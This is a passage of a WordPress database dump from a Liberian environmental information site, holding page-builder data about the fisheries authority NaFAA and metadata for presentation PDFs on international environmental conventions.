\"0\";s:8:\"keywords\";a:0:{}}}'),(22084,472,'_thumbnail_id','3220'),(22085,3221,'_wp_attached_file','2019/11/nafaa.jpg'),(22086,3221,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2019/11/nafaa.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"nafaa-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"nafaa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"nafaa-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22087,1588,'_thumbnail_id','3221'),(22088,3222,'_elementor_edit_mode','builder'),(22089,3222,'_elementor_template_type','wp-post'),(22090,3222,'_elementor_version','2.7.5'),(22091,3222,'_wp_page_template','default'),(22092,3222,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.<\\/p>\\n<p>The overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db49c3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"793fd76\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e046628\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48352ba\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"nafaa\\\",\\\"tag_id\\\":\\\"65\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"nafaa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:nafaa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(22093,3222,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(22095,3222,'_thumbnail_id','3221'),(22096,3223,'_wp_attached_file','2020/02/giz.jpg'),(22097,3223,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2020/02/giz.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"giz-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"giz-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"giz-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(22136,3226,'_elementor_controls_usage','a:0:{}'),(22137,3226,'by','FFI'),(22138,3226,'year','2020'),(22139,3226,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/11/NORADLargeMammalSurveyWonegizi-1.pdf'),(22140,3226,'_pods_cover_image','a:1:{i:0;i:573;}'),(22146,3226,'_dp_original','3081'),(22147,3226,'_edit_lock','1670324044:42'),(22148,3226,'_edit_last','42'),(22149,3227,'_wp_attached_file','2020/11/NORADLargeMammalSurveyWonegizi-1.pdf'),(22151,3226,'_pods_attached_document','a:1:{i:0;i:3227;}'),(22156,3226,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628434291;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3096;}i:1;a:1:{s:2:\"id\";i:3079;}i:2;a:1:{s:2:\"id\";i:3541;}}}}'),(22158,3229,'_elementor_controls_usage','a:0:{}'),(22159,3229,'download_link','<a class=\"button\" href=\"https://ekmsliberia.info/wp-content/uploads/2020/11/Piloting-REDD-in-the-Wonegizi-proposed-Protected-Area-Community-Benefits.pdf\" target=\"_blank\" rel=\"noopener\">View Document</a>'),(22160,3229,'by','DR MARY MOLOKWU-ODOZI'),(22161,3229,'year','2020'),(22166,3229,'_dp_original','2658'),(22167,3229,'_edit_lock','1670881871:42'),(22168,3229,'_edit_last','42'),(22169,3230,'_wp_attached_file','2020/11/Piloting-REDD-in-the-Wonegizi-proposed-Protected-Area-Community-Benefits.pdf'),(22171,3229,'_pods_attached_document','a:1:{i:0;i:3230;}'),(22173,3229,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628899772;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3079;}i:1;a:1:{s:2:\"id\";i:3226;}i:2;a:1:{s:2:\"id\";i:3541;}}}}'),(22252,3235,'_jetpack_related_posts_cache','a:1:{s:32:\"bfc62710165ed7b51223b165689d40a3\";a:2:{s:7:\"expires\";i:1616201792;s:7:\"payload\";a:2:{i:0;a:1:{s:2:\"id\";i:74;}i:1;a:1:{s:2:\"id\";i:68;}}}}'),(22253,3235,'_edit_lock','1616165237:42'),(22254,3235,'_edit_last','42'),(22255,3235,'ocean_sidebar','0'),(22256,3235,'ocean_second_sidebar','0'),(22257,3235,'ocean_disable_margins','enable'),(22258,3235,'ocean_shortcode_after_top_bar','[zoom_api_link meeting_id=\"123456789\" link_only=\"no\"]'),(22259,3235,'ocean_display_top_bar','default'),(22260,3235,'ocean_display_header','default'),(22261,3235,'ocean_center_header_left_menu','0'),(22262,3235,'ocean_custom_header_template','0'),(22263,3235,'ocean_header_custom_menu','2'),(22264,3235,'ocean_menu_typo_font_family','0'),(22265,3235,'ocean_disable_title','default'),(22266,3235,'ocean_disable_heading','default'),(22267,3235,'ocean_disable_breadcrumbs','default'),(22268,3235,'ocean_display_footer_widgets','default'),(22269,3235,'ocean_display_footer_bottom','default'),(22270,3235,'ocean_custom_footer_template','0'),(22271,3235,'osh_disable_topbar_sticky','default'),(22272,3235,'osh_disable_header_sticky','default'),(22273,3235,'osh_sticky_header_style','default'),(22274,3240,'_elementor_controls_usage','a:0:{}'),(22275,3240,'download_link','<a class=\"button\" href=\"https://ekmsliberia.info/wp-content/uploads/2020/12/ABS-Liberia.pdf\" target=\"_blank\" rel=\"noopener\">View Document</a>'),(22276,3240,'by','Frances Browne-Seydou'),(22277,3240,'year','2020'),(22282,3240,'_dp_original','2658'),(22283,3240,'_edit_lock','1670886152:42'),(22284,3240,'_edit_last','42'),(22285,3241,'_wp_attached_file','2020/12/ABS-Liberia.pptx'),(22290,3240,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628912416;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1776;}i:1;a:1:{s:2:\"id\";i:1711;}i:2;a:1:{s:2:\"id\";i:570;}}}}'),(22291,3242,'_wp_attached_file','2020/12/ABS-Liberia.pdf'),(22294,3240,'_pods_attached_document','a:1:{i:0;i:3242;}'),(22300,3243,'_elementor_controls_usage','a:0:{}'),(22301,3243,'download_link','<a class=\"button\" href=\"https://ekmsliberia.info/wp-content/uploads/2020/12/ACE.pdf\" target=\"_blank\" rel=\"noopener\">View Document</a>'),(22302,3243,'by','Teddy P. Taylor'),(22303,3243,'year','2020'),(22309,3243,'_dp_original','3240'),(22310,3243,'_edit_lock','1670886152:42'),(22311,3243,'_edit_last','42'),(22312,3244,'_wp_attached_file','2020/12/ACE.pdf'),(22314,3243,'_pods_attached_document','a:1:{i:0;i:3244;}'),(22318,3245,'_elementor_controls_usage','a:0:{}'),(22319,3245,'download_link','<a class=\"button\" href=\"https://ekmsliberia.info/wp-content/uploads/2020/12/An-Overview-of-the-Catagena-Protocol.pdf\" target=\"_blank\" rel=\"noopener\">View Document</a>'),(22320,3245,'by','Professor Sampson K. P. Chea'),(22321,3245,'year','2020'),(22327,3245,'_dp_original','3243'),(22328,3245,'_edit_lock','1670886152:42'),(22331,3243,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628724510;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3278;}i:1;a:1:{s:2:\"id\";i:1782;}i:2;a:1:{s:2:\"id\";i:2165;}}}}'),(22332,3245,'_edit_last','42'),(22333,3246,'_wp_attached_file','2020/12/An-Overview-of-the-Catagena-Protocol.pdf'),(22335,3245,'_pods_attached_document','a:1:{i:0;i:3246;}'),(22337,3247,'_elementor_controls_usage','a:0:{}'),(22338,3247,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/12/BC-Overview-_Jeff-Buchanan.pdf'),(22339,3247,'by','Jefferson Nyandibo'),(22340,3247,'year','2020'),(22346,3247,'_dp_original','3245'),(22347,3247,'_edit_lock','1670325092:42'),(22348,3247,'_edit_last','42'),(22349,3248,'_wp_attached_file','2020/12/BC-Overview-_Jeff-Buchanan.pdf'),(22351,3247,'_pods_attached_document','a:1:{i:0;i:3248;}'),(22353,3247,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628161174;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2658;}i:1;a:1:{s:2:\"id\";i:1751;}i:2;a:1:{s:2:\"id\";i:2248;}}}}'),(22354,3245,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628847748;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3257;}i:1;a:1:{s:2:\"id\";i:1780;}i:2;a:1:{s:2:\"id\";i:1776;}}}}'),(22355,3249,'_elementor_controls_usage','a:0:{}'),(22356,3249,'download_link','<a class=\"button\" href=\"https://ekmsliberia.info/wp-content/uploads/2020/12/BEST-PRACTICE-UNDER-THE-UNFCCC-2.pdf\" target=\"_blank\" rel=\"noopener\">View Document</a>'),(22357,3249,'by','Emmanuel Peters'),(22358,3249,'year','2020'),(22364,3249,'_dp_original','3245'),(22365,3249,'_edit_lock','1670426127:42'),(22366,3249,'_edit_last','42'),(22367,3250,'_wp_attached_file','2020/12/BEST-PRACTICE-UNDER-THE-UNFCCC-2.pdf'),(22369,3249,'_pods_attached_document','a:1:{i:0;i:3250;}'),(22371,3251,'_elementor_controls_usage','a:0:{}'),(22372,3251,'download_link','<a class=\"button\" href=\"https://ekmsliberia.info/wp-content/uploads/2020/12/BRIEF-OF-CITES-AND-ITS-IMPLEMENTATION-IN-LIBERIA.pdf\" target=\"_blank\" rel=\"noopener\">View Document</a>'),(22373,3251,'by','Blamah Goll'),(22374,3251,'year','2020'),(22380,3251,'_dp_original','3249'),(22381,3251,'_edit_lock','1615556053:42'),(22382,3251,'_edit_last','42'),(22383,3252,'_wp_attached_file','2020/12/BRIEF-OF-CITES-AND-ITS-IMPLEMENTATION-IN-LIBERIA.pdf'),(22385,3251,'_pods_attached_document','a:1:{i:0;i:3252;}'),(22387,3253,'_elementor_controls_usage','a:0:{}'),(22388,3253,'download_link','<a class=\"button\" href=\"https://ekmsliberia.info/wp-content/uploads/2020/12/Brief-on-the-Minamata-Convention-on-Mercury.pdf\" target=\"_blank\" rel=\"noopener\">View Document</a>'),(22389,3253,'by','John K. Jallah Jr.'),(22390,3253,'year','2020'),(22396,3253,'_dp_original','3251'),(22397,3253,'_edit_lock','1615556066:42'),(22398,3251,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628988035;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2609;}i:1;a:1:{s:2:\"id\";i:3261;}i:2;a:1:{s:2:\"id\";i:3079;}}}}'),(22399,3249,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628724522;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1780;}i:1;a:1:{s:2:\"id\";i:2252;}i:2;a:1:{s:2:\"id\";i:3243;}}}}'),(22414,3253,'_edit_last','42'),(22415,3256,'_wp_attached_file','2020/12/Brief-on-the-Minamata-Convention-on-Mercury.pdf'),(22416,3253,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1629028241;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3263;}i:1;a:1:{s:2:\"id\";i:3269;}i:2;a:1:{s:2:\"id\";i:2154;}}}}'),(22418,3253,'_pods_attached_document','a:1:{i:0;i:3256;}'),(22420,3257,'_elementor_controls_usage','a:0:{}'),(22421,3257,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/12/CBD-buchanan-november-26.pdf'),(22422,3257,'by','J.S. Datuama Cammue'),(22423,3257,'year','2020'),(22429,3257,'_dp_original','3253'),(22430,3257,'_edit_lock','1631082983:38'),(22431,3258,'_wp_attached_file','2020/12/CBD-buchanan-november-26.pdf'),(22432,3257,'_edit_last','38'),(22434,3257,'_pods_attached_document','a:1:{i:0;i:3258;}'),(22436,3259,'_elementor_controls_usage','a:0:{}'),(22437,3259,'download_link','<a class=\"button\" href=\"https://ekmsliberia.info/wp-content/uploads/2020/12/CCAC-Presentation.pdf\" target=\"_blank\" rel=\"noopener\">View Document</a>'),(22438,3259,'by','Joseph F. Charles'),(22439,3259,'year','2020'),(22445,3259,'_dp_original','3257'),(22446,3259,'_edit_lock','1615557336:42'),(22447,3259,'_edit_last','42'),(22448,3260,'_wp_attached_file','2020/12/CCAC-Presentation.pdf'),(22450,3259,'_pods_attached_document','a:1:{i:0;i:3260;}'),(22452,3261,'_elementor_controls_usage','a:0:{}'),(22453,3261,'download_link',''),(22454,3261,'by','Hawa Kortu Walker'),(22455,3261,'year','2020'),(22461,3261,'_dp_original','3259'),(22462,3261,'_edit_lock','1629292708:38'),(22463,3261,'_edit_last','38'),(22464,3262,'_wp_attached_file','2020/12/CMS.pdf'),(22466,3261,'_pods_attached_document','a:1:{i:0;i:3262;}'),(22468,3259,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1629038626;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3243;}i:1;a:1:{s:2:\"id\";i:2165;}i:2;a:1:{s:2:\"id\";i:2150;}}}}'),(22469,3257,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627342826;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2609;}i:1;a:1:{s:2:\"id\";i:570;}i:2;a:1:{s:2:\"id\";i:1780;}}}}'),(22470,3261,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1629063299;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2609;}i:1;a:1:{s:2:\"id\";i:570;}i:2;a:1:{s:2:\"id\";i:3226;}}}}'),(22471,3263,'_elementor_controls_usage','a:0:{}'),(22472,3263,'download_link','<a class=\"button\" href=\"https://ekmsliberia.info/wp-content/uploads/2020/12/GCC.pdf\" target=\"_blank\" rel=\"noopener\">View Document</a>'),(22473,3263,'by','Josephine F. Doles'),(22474,3263,'year','2020'),(22480,3263,'_dp_original','3261'),(22481,3263,'_edit_lock','1615557930:42'),(22482,3263,'_edit_last','42'),(22483,3264,'_wp_attached_file','2020/12/GCC.pdf'),(22485,3263,'_pods_attached_document','a:1:{i:0;i:3264;}'),(22487,3265,'_elementor_controls_usage','a:0:{}'),(22488,3265,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/12/Ozone.pdf'),(22489,3265,'by','Sete F. Marshall'),(22490,3265,'year','2020'),(22496,3265,'_dp_original','3263'),(22497,3265,'_edit_lock','1670324722:42'),(22498,3266,'_wp_attached_file','2020/12/Ozone.pdf'),(22499,3265,'_edit_last','42'),(22501,3265,'_pods_attached_document','a:1:{i:0;i:3266;}'),(22503,3267,'_elementor_controls_usage','a:0:{}'),(22504,3267,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/12/Presentation-CBIT-RIO-Convention-Workshop-Buchanan.pdf'),(22505,3267,'by','Arthur R.M Becker'),(22506,3267,'year','2020'),(22512,3267,'_dp_original','3265'),(22513,3267,'_edit_lock','1670324723:42'),(22514,3267,'_edit_last','42'),(22515,3268,'_wp_attached_file','2020/12/Presentation-CBIT-RIO-Convention-Workshop-Buchanan.pdf'),(22517,3267,'_pods_attached_document','a:1:{i:0;i:3268;}'),(22519,3269,'_elementor_controls_usage','a:0:{}'),(22520,3269,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/12/Stockholm-Convention.pdf'),(22521,3269,'by','Jerry T. Toe Sr.'),(22522,3269,'year','2020'),(22528,3269,'_dp_original','3267'),(22529,3269,'_edit_lock','1670324724:42'),(22530,3269,'_edit_last','42'),(22531,3270,'_wp_attached_file','2020/12/Stockholm-Convention.pdf'),(22533,3269,'_pods_attached_document','a:1:{i:0;i:3270;}'),(22535,3271,'_elementor_controls_usage','a:0:{}'),(22536,3271,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/12/THE-RAMSAR-CONVENTION.pdf'),(22537,3271,'by','Levi Z. Piah'),(22538,3271,'year','2020'),(22544,3271,'_dp_original','3269'),(22545,3271,'_edit_lock','1670324581:42'),(22546,3271,'_edit_last','43'),(22547,3272,'_wp_attached_file','2020/12/THE-RAMSAR-CONVENTION.pdf'),(22549,3271,'_pods_attached_document','a:1:{i:0;i:3272;}'),(22551,3273,'_elementor_controls_usage','a:0:{}'),(22552,3273,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/12/TNA-PROJECT.pdf'),(22553,3273,'by','Christopher B. Kabah'),(22554,3273,'year','2020'),(22560,3273,'_dp_original','3271'),(22561,3273,'_edit_lock','1670324585:42'),(22562,3273,'_edit_last','42'),(22563,3274,'_wp_attached_file','2020/12/TNA-PROJECT.pdf'),(22564,3271,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628822261;s:7:\"payload\";a:1:{i:0;a:1:{s:2:\"id\";i:1780;}}}}'),(22566,3273,'_pods_attached_document','a:1:{i:0;i:3274;}'),(22568,3275,'_elementor_controls_usage','a:0:{}'),(22569,3275,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/12/UNCCD-INTRO_CCCD_BUCHANAN_26112020.pdf'),(22570,3275,'by','Berexford S. 